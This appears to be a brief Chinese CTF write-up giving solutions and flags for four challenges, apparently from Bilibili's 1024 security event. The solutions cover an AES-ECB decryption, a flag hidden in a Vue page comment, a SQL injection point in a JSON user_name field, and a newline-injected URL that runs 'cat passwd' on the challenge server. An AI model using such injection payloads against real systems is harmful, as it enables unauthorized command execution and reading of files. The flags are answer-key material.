第一题:
加密方式:AES 加密
加密模式:ECB
填充方式:无影响,都可以
Key:hAPPy_1024_2233
96 位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156
输出方式:Hex(十六进制)
解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9
第二题:
F12-Sources-webpack-src-views-home.vue页面的注释里
36c7a7b4-cda04af0-8db0368d-b5166480
第三题:
下载源码审计
接换行符匹配正则表达式,换行执行命令
http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd
9d3c3014-6c6267e7-086aaee5-1f18452a
第四题:
JSON user_name存在注入点
3d5dd579-0678ef93-18b70cae-cabc5d51